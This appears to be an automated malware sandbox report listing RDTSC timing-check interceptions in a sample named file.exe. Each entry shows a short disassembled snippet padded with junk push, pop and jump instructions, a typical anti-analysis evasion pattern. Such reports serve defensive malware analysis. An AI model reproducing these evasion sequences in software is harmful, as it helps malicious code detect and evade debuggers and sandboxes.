    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C291 second address: 99C295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998661 second address: 998680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FDDACAD5299h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9965F4 second address: 996620 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDDACF47FE5h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D3C3 second address: 99D3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B54B second address: 99B56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FDEh 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDDACF47FDBh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D55C second address: 99D590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD5299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDDACAD528Fh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D590 second address: 99D594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D594 second address: 99D59A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D59A second address: 99D634 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDDACF47FDCh 0x00000008 jnl 00007FDDACF47FD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D3511h], eax 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov edi, edx 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 or dword ptr [ebp+122D2724h], eax 0x0000002d mov eax, dword ptr [ebp+122D0E81h] 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FDDACF47FD8h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d movzx ebx, bx 0x00000050 jns 00007FDDACF47FE2h 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push ebp 0x0000005b call 00007FDDACF47FD8h 0x00000060 pop ebp 0x00000061 mov dword ptr [esp+04h], ebp 0x00000065 add dword ptr [esp+04h], 0000001Ch 0x0000006d inc ebp 0x0000006e push ebp 0x0000006f ret 0x00000070 pop ebp 0x00000071 ret 0x00000072 mov dword ptr [ebp+1244023Bh], edx 0x00000078 push eax 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c jg 00007FDDACF47FD6h 0x00000082 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D634 second address: 99D638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D638 second address: 99D642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2DCA second address: 9A2DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A2DD0 second address: 9A2DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FE2h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6626 second address: 9A662F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A662F second address: 9A6646 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A6646 second address: 9A664A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABD62 second address: 9ABD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABD66 second address: 9ABD6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ABD6A second address: 9ABD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B25B8 second address: 9B25BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B2241 second address: 9B226B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDDACF47FDBh 0x00000010 pushad 0x00000011 jnp 00007FDDACF47FD6h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B226B second address: 9B227E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDDACAD528Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B23F8 second address: 9B241F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FDDACF47FDEh 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FDDACF47FDEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B241F second address: 9B242C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FDDACAD529Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B242C second address: 9B244C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FE0h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FDDACF47FD6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B244C second address: 9B2450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982DCD second address: 982DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982EAA second address: 982EAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983232 second address: 983238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983532 second address: 983538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983538 second address: 983557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983557 second address: 98355D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98355D second address: 983562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983562 second address: 98356C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDDACAD5286h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9835A9 second address: 9835AE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9836FC second address: 983700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983DBA second address: 983DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FDDACF47FD6h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9840A6 second address: 9840AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9840AB second address: 9840B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9840B0 second address: 9685F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD528Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FDDACAD5288h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov ecx, dword ptr [ebp+122D29DEh] 0x0000002f call dword ptr [ebp+122D34FCh] 0x00000035 push eax 0x00000036 push edx 0x00000037 push edx 0x00000038 jmp 00007FDDACAD5299h 0x0000003d pushad 0x0000003e popad 0x0000003f pop edx 0x00000040 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9685F2 second address: 9685F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9835A5 second address: 9835A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B58B0 second address: 9B58B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B58B4 second address: 9B58BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B58BC second address: 9B58C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5B3A second address: 9B5B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5B3E second address: 9B5B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5B44 second address: 9B5B49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5CD0 second address: 9B5CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B5CD4 second address: 9B5CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B60C5 second address: 9B60C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDCC9 second address: 9BDCE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jl 00007FDDACAD5286h 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDDACAD528Eh 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDE12 second address: 9BDE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDE16 second address: 9BDE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDF70 second address: 9BDF7E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDDACF47FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDF7E second address: 9BDF9C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FDDACAD5294h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDF9C second address: 9BDFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FE6h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BDFB6 second address: 9BDFBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BD9F8 second address: 9BDA02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FDDACF47FD6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE6A8 second address: 9BE6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE6AE second address: 9BE6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BEC35 second address: 9BEC39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C72B0 second address: 9C72BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FDDACF47FD6h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5D2B second address: 9C5D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948F72 second address: 948F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FDDACF47FE3h 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C63A4 second address: 9C63AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FDDACAD5286h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6670 second address: 9C6674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6929 second address: 9C692F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C692F second address: 9C6935 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6935 second address: 9C6940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6940 second address: 9C6972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FE1h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e jmp 00007FDDACF47FDAh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDDACF47FDAh 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6C42 second address: 9C6C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACAD5297h 0x00000009 je 00007FDDACAD5286h 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C6C64 second address: 9C6C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FDDACF47FE7h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C9CC9 second address: 9C9CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE324 second address: 9CE33A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FDDACF47FE2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE33A second address: 9CE340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE340 second address: 9CE349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE5A3 second address: 9CE5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4EC2 second address: 9D4ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FE1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D4ED9 second address: 9D4EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDDACAD5296h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D51F5 second address: 9D5227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FDDACF47FD6h 0x00000009 jl 00007FDDACF47FD6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jo 00007FDDACF47FDEh 0x00000019 jp 00007FDDACF47FD6h 0x0000001f pushad 0x00000020 popad 0x00000021 je 00007FDDACF47FDCh 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5362 second address: 9D5368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D551E second address: 9D5533 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007FDDACF47FE2h 0x0000000d jc 00007FDDACF47FDCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983A8A second address: 983A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983A8F second address: 983AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDDACF47FDBh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D598D second address: 9D5993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5993 second address: 9D59A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007FDDACF47FE2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D59A0 second address: 9D59D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDDACAD5286h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDDACAD5295h 0x00000012 jnl 00007FDDACAD5292h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA408 second address: 9DA40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA40E second address: 9DA414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA414 second address: 9DA41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA41C second address: 9DA422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA422 second address: 9DA427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA5A7 second address: 9DA5AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA5AB second address: 9DA5BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA864 second address: 9DA86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA86A second address: 9DA879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007FDDACF47FDAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DA9C9 second address: 9DA9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDC17 second address: 9DDC34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDDACF47FE7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DDC34 second address: 9DDC42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDACAD528Ah 0x00000009 rdtsc
